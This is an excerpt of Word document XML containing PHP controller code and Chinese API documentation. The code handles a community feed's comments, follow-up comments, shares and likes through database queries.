    <w:p w14:paraId="0AA668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member_id', $this-&gt;memberId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF175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xia_id', $ping_xia['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46331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316874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F5A19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8DBA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2FBC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ping_xias'] = $ping_xias;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386C3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B0A5B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data'][$key]['ping_xias'] = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4776C9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200B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56E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719B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pings);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45714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E302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EF84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ping_xias </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获得社区文追评列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ACE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得社区动态追评列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA8B0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2E8080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2BEF7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43356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71C686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id      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68229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132AC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er_page      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A719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社区动态列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22114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0BD61D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30297C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码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AB1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              </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394E5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username  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该追评作者昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0EA5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img       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该追评作者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DF9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             </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否点赞该追评：</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7BF0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29F3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xias()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6A0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CA7E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2D6E3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78415A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E28FE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5C54E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D674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29D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8294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317D3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2BC83A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B7F7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244F0E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7FAFE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430D9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AEFD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F6C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36EC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ing_id = input('param.ping_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0A00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id == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB35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47CDB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64EEC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70A2B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2885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A55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 = Db::name('circle_article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D707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4F3A49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0A1AB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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D32C3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F835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评论不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB5E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55F2C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69B6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9593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745A09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3D2C4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 = Db::name('circle_article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67843B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id', $ping_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F78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7052E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385756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09968F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_xias['data']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700D19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_xias['data'] as $key =&gt; $ping_xia) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A33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author_username'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3C73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author_img'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601EB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zan'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D32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ping_xia['member_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03970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52EAA9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author_username'] = $author['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F794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author_img'] = $author['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A44B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A2F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DF40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s['data'][$key]['zan'] = Db::name('circle_article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364F14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12CE2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ping_xia_id', $ping_xia['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A277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278A4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F63D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4ECC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186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E66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ping_xias);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F37C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8DDC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626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share </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分享社区动态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040F2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分享社区动态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539E6E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00650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D3FCC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63975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String} ret       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户分享成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F441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分享失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32965C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D59CA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B33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share()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFF8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0D6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E6DE5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28FD4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7812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131BE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分享社区动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C64A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3C7AF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3A2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7F00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4D348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72CBD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0165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43649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4D2FB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01F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EDCE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3C811A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3FDD88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0BC16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3AC1CF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38504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7A6A50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share_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8E7F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C23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分享成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A03F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E32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7564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36472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2F7A25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BF64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1CEF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2F77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FFCB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37E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F35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zan </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点赞｜取消点赞社区动态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19811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社区动态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09726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3EB2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0719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1AB1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2AA0D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76BF04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191B7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4DA52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46DD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E50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article_zan()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4F5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E527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32E0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67673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CFE76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9036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社区动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23729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D6FD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D453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8996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225EF8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3075DD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4CC1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3FF6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7A71D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34FF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93972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4BF0B6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6C86F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07901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0D4C23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_id'] = $article_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF66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zan = Db::name('circle_article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CA1E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C101C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1333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article_zan)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B898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zan['zan'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C9A1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zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73323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7B12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12468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37425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1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06455E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2E3BB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A9F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6B93E5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23E5FF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49864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_num' =&gt; $article['zan_num'] - 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDC5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_num' =&gt; $article['cai_num'] + 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B54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C05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动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEB0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 '', '', '', $article_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ABF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8B9C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41EFF6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2DD50A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086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A446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zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC10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23A3A5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update([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FDA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39174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 =&gt; 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D428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0D003A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8D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06100E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31197E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3A225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_num' =&gt; $article['zan_num'] + 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535AB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i_num' =&gt; $article['cai_num'] - 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B496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DB82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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421C6F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 '', '', '', $article_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F33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7AEB1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73ED57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73314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B61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E69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AC82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2B3F8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ai'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA00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1BC7F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zan_id = Db::name('circle_article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6091A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4FCE6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zan_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9D6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7DD5EC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12CE8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_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1860B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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E50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 '', '', '', $article_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E515F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2C7B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12CE6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129934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74C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678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D2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38E4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573B9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43B03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59A558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381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F6E6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06D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BF3F7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69785C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9735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6195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FC1FF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7FB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ping </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论社区动态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9FD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评论社区动态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AB13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60683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2E840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62F677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244D7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评论内容（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6E0D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发表评论成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580DA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发表评论失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFC2D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6E7755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211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ping()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58431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2B9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D9530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5F767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E17D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3727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评论社区动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68929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B48EF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1BE3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F16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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49316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tent == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086F9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097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评论内容不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E3C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2562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049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D7A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25DB5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6AAAF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569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315D9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84C2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2002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1A8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45148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408B03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01707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7E8DC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_id'] = $article_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FECC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content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF1C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_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0895B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xia_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7300F8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075725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id = Db::name('circle_article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35476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0E8FBE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id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B85A1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108C48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70C616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setInc('ping_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5C77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评论您所发布的动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486B71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 '', '', '', $article_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFF1F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2631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发表评论成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEDB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533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F9FD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728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16DE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71419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B8AE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E8D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032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7F6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D891A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发表评论失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC57F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6C7E5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AE0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9AA2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4E65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ping_zan </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点赞｜取消点赞动态评论</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A76E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动态评论</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004C2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5764E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6B95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3099F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id     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBA5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32F02C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42EEEF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636AE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183C52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34E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ping_zan()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521B3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D2F8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08A9C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709CC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9A978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58D6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动态评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7471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3A21C2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1DA3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19C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id = input('param.ping_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E49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id == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D37B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EA0E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动态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2A457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5E6C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508B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A0B1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 = Db::name('circle_article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F44D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055C7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768C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empty($ping)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E862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id'] = $ping_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261C9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zan = Db::name('circle_article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CEF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49BB13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8EBA9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ircle_article_ping_zan)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DCFE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zan['zan'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002C9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zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49949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479DF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328E03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0D187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7FBD3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1D58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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E16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39566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zan_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427EF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动态评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2AE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member_id'], $content, '', '', '', $ping['article_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57118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6BC2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0AAB0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5E0F04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2AA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C830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zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEF03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2E5F3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163C4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21414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618F0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0189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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2102DA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059810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_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BAEA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评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBE8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member_id'], $content, '', '', '', $ping['article_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D829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4EFAF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1A3882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04F13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0A0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E5E2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23AC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13A41C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19F0AD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zan_id = Db::name('circle_article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412B8C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3EB582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zan_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5459DF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E6B3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2B78BD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setInc('zan_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52022A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评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382EFF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member_id'], $content, '', '', '', $ping['article_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E093C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351C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336F4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4FCFF0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522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B3C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E5F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13092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F7DC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动态评论不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078C3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28B90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0B1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61A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B771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69937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6EF05D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64703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05B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8524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CC2E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ping_xia </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追评社区动态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34256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追评社区动态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6AB1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0A194E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7E79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B50F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必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B999C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id     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F10D3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追评内容（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23838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追评成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0882A8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追评失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1797D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36D27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A6C8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ping_xia()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705E0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10E0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3C80E7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384241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0D61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FCB0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追评社区动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F02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DA67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2E5F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0E1B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B47A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ntent == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0630B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5D25A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追评内容不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F8B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7D658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A776E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DC31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24532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2543A4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F053C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76EC2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DB0F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3E46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8122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2C6C2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4D3B4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666A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5C1483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id = input('param.ping_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A02B5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id == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FFA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E766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动态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6ECC6E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3B5CD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93C9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0A79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 = Db::name('circle_article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58508D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25454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CDD8F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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC4C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_id'] = $article_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A929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id'] = $ping_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BB30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content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F41E5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_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0FBC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3CD053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xia_id = Db::name('circle_article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1789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6508D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xia_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC981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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107739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id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F00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ping_xia_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7440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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E184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67A380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ping_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0680D7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追评您所发布的动态评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C85C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member_id'], $content, '', '', '', $article_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C966D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E32A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追评成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E422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1F0D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555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CCFA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523A8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动态评论不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F60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0F88F0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6F90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A0FF8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B95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D459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B754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社区动态不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543643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40CE73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2FE0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C20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328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8E5F5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追评失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F5E5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C728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F83B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117B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B99B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article_ping_xia_zan </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点赞｜取消点赞动态追评</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139179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点赞｜取消点赞动态追评</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFFE6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A47D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08C5F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6437C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ing_xia_id  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态追评</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
